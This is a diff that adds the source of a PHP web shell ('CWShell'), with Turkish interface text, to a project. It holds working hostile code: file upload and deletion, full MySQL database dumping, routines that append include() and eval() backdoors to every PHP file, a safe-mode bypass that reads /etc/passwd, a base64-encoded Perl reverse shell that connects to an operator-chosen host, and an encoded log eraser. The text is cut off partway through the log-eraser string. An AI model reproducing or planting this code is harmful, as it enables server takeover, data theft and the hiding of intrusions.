+   $ctd = fopen($name,"w+");
+   fwrite($ctd, $src);
+   fclose($ctd);
+   echo "<script>alert('Uploaded')</script>";
+      }
+
+// Upload File
+   $path = @$_FILES['ffile']['tmp_name'];
+   $name = @$_FILES['ffile']['name'];
+   if(isset($path) && isset($name))
+{  
+if($_POST['dare'] != realpath("."))  { $name = $_POST['dare'].$name; } 
+   if(move_uploaded_file($path, $name))
+   {
+      echo "<script>alert('Uploaded')</script>";
+   }
+   else
+   {
+      echo "<script>alert('Error')</script>";
+}   }
+
+// Delete File
+
+   
+   if(isset($delete) && $delete != $dir)
+{
+      if(file_exists($delete))
+      {
+         unlink($delete);
+         echo "<script>alert('File Deleted')</script>";
+      }
+
+}
+
+// Database
+   
+   if(isset($db) && isset($query) && isset($_POST['godb']))
+{
+   $mysql = mysql_connect("localhost", $user, $pass)or die("<script>alert('Connection Failed')</script>");
+   $db = mysql_select_db($db)or die(mysql_error());
+   $queryz = mysql_query($query)or die(mysql_error());
+if($query) { echo "<script>alert('Done')</script>"; }
+else { echo "<script>alert('Error')</script>"; }
+}
+
+// Dump Database [pacucci.com]
+if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){
+mysql_connect('localhost', $user, $pass);
+mysql_select_db($db);
+$tables = mysql_list_tables($db);
+while ($td = mysql_fetch_array($tables))
+{
+$table = $td[0];
+$r = mysql_query("SHOW CREATE TABLE `$table`");
+if ($r)
+{
+$insert_sql = "";
+$d = mysql_fetch_array($r);
+$d[1] .= ";";
+$SQL[] = str_replace("\n", "", $d[1]);
+$table_query = mysql_query("SELECT * FROM `$table`");
+$num_fields = mysql_num_fields($table_query);
+while ($fetch_row = mysql_fetch_array($table_query))
+{
+$insert_sql .= "INSERT INTO $table VALUES(";
+for ($n=1;$n<=$num_fields;$n++)
+{
+$m = $n - 1;
+$insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', ";
+}
+$insert_sql = substr($insert_sql,0,-2);
+$insert_sql .= ");\n";
+}
+if ($insert_sql!= "")
+{
+$SQL[] = $insert_sql;
+}
+}
+}
+$dump = "-- Database: ".$_POST['db'] ." \n";
+$dump .= "-- CWShellDumper v3\n";
+$dump .= "-- Cyber-Warrior.Org\n";
+$dumpp = $dump.implode("\r", $SQL);
+$name = $db."-".date("d-m-y")."cyberwarrior.sql";
+Header("Content-type: application/octet-stream"); 
+Header("Content-Disposition: attachment; filename = $name");
+echo $dumpp; 
+die();
+}
+
+// Make Dir
+if(isset($mkdir)) {
+
+mkdir($mkdir);
+if($mkdir) { echo "<script>alert('Tamamdır.')</script>"; } }
+
+// Delete Directory
+
+if(isset($mydir) && $mydir != "$dir") {
+$d = dir($mydir);
+while($entry = $d->read()) {
+ if ($entry !== "." && $entry !== "..") {
+ unlink($entry);
+ }
+}
+$d->close();
+rmdir($mydir);
+
+}
+
+//Infect Files [RFI]
+
+if(isset($_POST['inf3ct']))
+{
+foreach (glob("*.php") as $lola)
+{
+$dira = '.';
+$asdi = fopen($lola, 'a+');
+@fwrite($asdi, '
+<?php
+include($_GET[\'pwn\']); 
+?>');
+@fclose($asdi);
+}
+if($asdi)
+{
+$textzz = '<font size=2 color=lightgreen>Oldu:<br> ?pwn=[shell]</font>';
+}
+else {
+$textzz = '<font size=2 color=red>HATA! (Permlere Dikkat Et..)</font>';
+}
+}
+
+//Infect Files [Eval]
+if(isset($_POST['evalinfect']))
+{
+foreach (glob("*.php") as $lal)
+{
+$dira = '.';
+$axd = fopen($lal, 'a+');
+@fwrite($axd, '
+<?php
+eval(stripslashes($_GET[\'eval\'])); 
+?>');
+@fclose($axd);
+}
+if($axd)
+{
+$textz0 = '<font size=2 color=lightgreen>Oldu:<br> ?eval=[eval]</font>';
+}
+else {
+$textz0 = '<font size=2 color=red>HATA! (Permler IZIn Vermior..)</font>';
+}
+}
+
+// Images
+   if(@$_GET['com'] == "image")
+   {
+   $images = array(
+   "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC",
+   "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC",
+   "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7"
+   );
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+$image = $images[$_GET['img']];
+ echo  base64_decode($image);
+ }
+//File List
+
+   chdir($dir);
+   if(!isset($dir)) { $dir = @realpath("."); }
+    if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; }
+   if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;}
+   $pahtw = 0;
+   $filew = 0;
+   $num = 1;
+  
+   if (is_dir($dir))
+   {
+      if ($open = opendir($dir))
+      {
+	  if(is_dir($dir)) {
+   $typezz = "DIR";
+   $pahtw++;
+ }
+         while (($list = readdir($open)) == true)
+         {
+		 
+         if(is_dir($list)) {
+   $typezz = "DIR";
+   $pahtw++;
+   @$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; }
+else {
+  
+   $lolz = filesize($list) / 1024;
+   $lolx = intval($lolz);
+   if($lolx == 0) { $lolx = 1; }
+   $typezz = "DOSYA";
+   $filew++;
+   $listz = "/".$list;
+   if(eregi($page,$listz)) {    @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
+   elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
+   else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }  }
+   
+   }         
+   closedir($open);
+         
+      }
+$fileq = $pahtw + $filew;   }
+
+
+
+
+echo "<html>
+<head><title>$site ~ CWShéLL - Edited By KingDefacer</title>
+<style>
+table.menu {
+border-width: 0px;
+   border-spacing: 1px;
+   border-style: solid;
+   border-color: #a6a6a6;
+   border-collapse: separate;
+   background-color: rgb(98, 97,97);
+}
+table.menuz {
+border-width: 0px;
+   border-spacing: 1px;
+   border-style: solid;
+   border-color: #a6a6a6;
+   border-collapse: separate;
+   background-color: rgb(98, 97,97);
+}
+table.menu td {
+   border-width: 1px;
+   padding: 1px;
+   border-style: none;
+   border-color: #333333;
+   background-color: #000000;
+   -moz-border-radius: 0px;
+}
+table.menuz tr {
+   border-width: 1px;
+   padding: 1px;
+   border-style: none;
+   border-color: #333333;
+   background-color: #000000;
+   -moz-border-radius: 0px;
+}
+
+table.menuz tr:hover {
+	background-color: #111111;
+}
+input,textarea,select {
+font: normal 11px Verdana, Arial, Helvetica, sans-serif;
+background-color:black;
+color:#a6a6a6;
+border: solid 1px #363636;
+}
+</style>
+</head>
+<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
+<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
+<tr><td>
+<center><b><font size='6' face='Webdings'>ü</font>
+<font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
+<font size='6' face='Webdings'>ü</font></b>
+</center>
+</td></tr></table><table class=menu width=100%<tr><td>
+<font size='1' face='Verdana'><b>Site:  </b><u>$site</u> <br>
+<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
+<b>Server Bilgisi : </b> <u>$info</u> <br>
+<b>Uname -a:</b> <u>$uname</u> <br>
+<b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
+<b>Safe Mode:</b>  <u>$safemode</u> <br>
+<b>Sihirli Sozler:</b> <u>$quot</u> <br>
+<b>Sayfa:</b> <u>$page</u><br>
+<b>Boş Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
+<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
+<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
+<tr><td><form method='post' action=''>
+<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
+// Safe Mode Bypass
+if(isset($_POST['safemodz']))
+{
+echo "<tr><td valign=top width=50%>
+<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>
+<form action='' method='post'>
+      <font size='1' face='Verdana'>Dosya adı:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayı Oku' name='redfi'><br>
+	  </td><tr>
+<td valign=top>
+<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>
+   <form method='post' action=''>
+   <font size='1' face='Verdana'>Klasör:</font><br>
+   <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
+  }
+   // Safe Mode Bypass: File
+if(isset($_POST['redfi']))
+{
+    $test='';
+    $tempp= tempnam($test, "cx");
+    $get = htmlspecialchars($_POST['filew']);
+    if(copy("compress.zlib://".$get, $tempp)){
+    $fopenzo = fopen($tempp, "r");
+    $freadz = fread($fopenzo, filesize($tempp));
+    fclose($fopenzo);
+    $source = htmlspecialchars($freadz);
+    echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>";
+    unlink($tempp);
+    } else {
+    echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>";
+            }
+   
+}
+
+// Safe Mode Bypass: Directory
+ if(isset($_POST['reddi'])){ 
+   
+function dirz()
+{
+$dirz = $_POST['directory'];
+$files = glob("$dirz*");
+
+foreach ($files as $filename) {
+    echo "<tr><td><font size='1' face='Verdana'>";
+   echo "$filename\n";
+   echo "</font><br>";
+}
+}
+echo "<br>"; dirz(); 
+}
+
+// Connect Back
+if(isset($_POST['connectback']))
+{
+echo "
+<tr><td>
+<center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
+<form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>"; 
+}
+if(isset($_POST['logeraser']))
+{
+echo "<tr><td>
+<center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
+        <select name=functionp>
+          <option>linux</option>
+          <option>sunos</option>
+          <option>aix</option>
+          <option>irix</option>
+          <option>openbsd</option>
+		  <option>solaris</option>
+		  <option>suse</option>
+		  <option>lampp</option>
+		  <option>debian</option>
+		  <option>freebsd</option>
+		  <option>misc</option>
+        </select><br><input type='submit' name='runer' value='Erase'></table>";
+		}
+		
+// Connect Back
+if(isset($_POST['connsub']))
+{
+$sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
+$openz = fopen("cbs.pl", "w+")or die("Error");
+fwrite($openz, $sources)or die("Error");
+fclose($openz);
+$aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
+unlink("cbs.pl");
+}
+if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; }
+
+		// Logs Eraser
+if(isset($_POST['runer']))
+{
+echo "<tr><td><center><textarea cols='30' rows='2'>";
+$erase = base64_decode("IyF1c3IvYmluL3BlcmwNCiMgQ1dTSGVsbA0KICAgICAgIGNob21wKCRvcyA9ICRBUkdWWzBdKTsNCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcIm1pc2NcIil7ICNJZiBtaXNjIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdbWlzYyBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCI8dHI+WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYSA9IHVubGluayBAbWlzYzsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJIA0KICAgICAgICAgICAgaWYoJGEpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwib3BlbmJzZFwiKXsgI0lmIG9wZW5ic2QgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11vcGVuYnNkIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGIgPSB1bmxpbmsgQG9wZW5ic2Q7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgIGlmKCRiKSB7cHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7ICAgfQ0KCQkJZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJmcmVlYnNkXCIpeyAjSWYgZnJlZWJzZCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXWZyZWVic2QgU2VsZWN0ZWQuLi5cXG5cIjsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYyA9IHVubGluayBAZnJlZWJzZDsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRjKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJkZWJpYW5cIil7ICNJZiBEZWJpYW4gdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11kZWJpYW4gU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZCA9IHVubGluayBAZGViaWFuOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGQpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdXNlXCIpeyAjSWYgc3VzZSB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXXN1c2UgU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZSA9IHVubGluayBAc3VzZTsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgaWYoJGUpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSBlbHNlIHsgcHJpbnQgXCJbLV1FcnJvclwiOyB9DQogICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcInNvbGFyaXNcIil7ICNJZiBzb2xhcmlzIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdc29sYXJpcyBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRmID0gdW5saW5rIEBzb2xhcmlzOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGYpIHtwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwibGFtcHBcIil7ICNJZiBsYW1wcCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxhbXBwIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGcgPSB1bmxpbmsgQGxhbXBwOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICBpZigkZykgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkgICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJyZWRoYXRcIil7ICNJZiByZWRoYXQgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11SZWQgSGF0IExpbnV4L01hYyBPUyBYIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGggPSB1bmxpbmsgQHJlZGhhdDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRoKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KICAgICAgIA0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcImxpbnV4XCIpeyAjSWYgbGludXggdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11MaW51eCBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRpID0gdW5saW5rIEBsaW51eDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJaWYoJGkpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7fSANCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCgkJfSAgICAgIA0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdW5vc1wiKXsgI0lmIHN1bm9zIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICBwcmludCBcIlsrXVN1bk9TIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgICRsID0gdW5saW5rIEBzdW5vczsNCiAgICAgICAgICAgICAgaWYoJGwpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9ICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgaWYoJG9zIGVxIFwiYWl4XCIpeyAjSWYgYWl4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICAgICBwcmludCBcIlsrXUFpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbSA9IHVubGluayBAYWl4Ow0KICAgICAgICAgICAgICBpZigkbSkgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmKCRvcyBlcSBcImlyaXhcIil7ICNJZiBpcml4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0DQogICAgICAgICAgICAgIHByaW50IFwiWytdSXJpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbG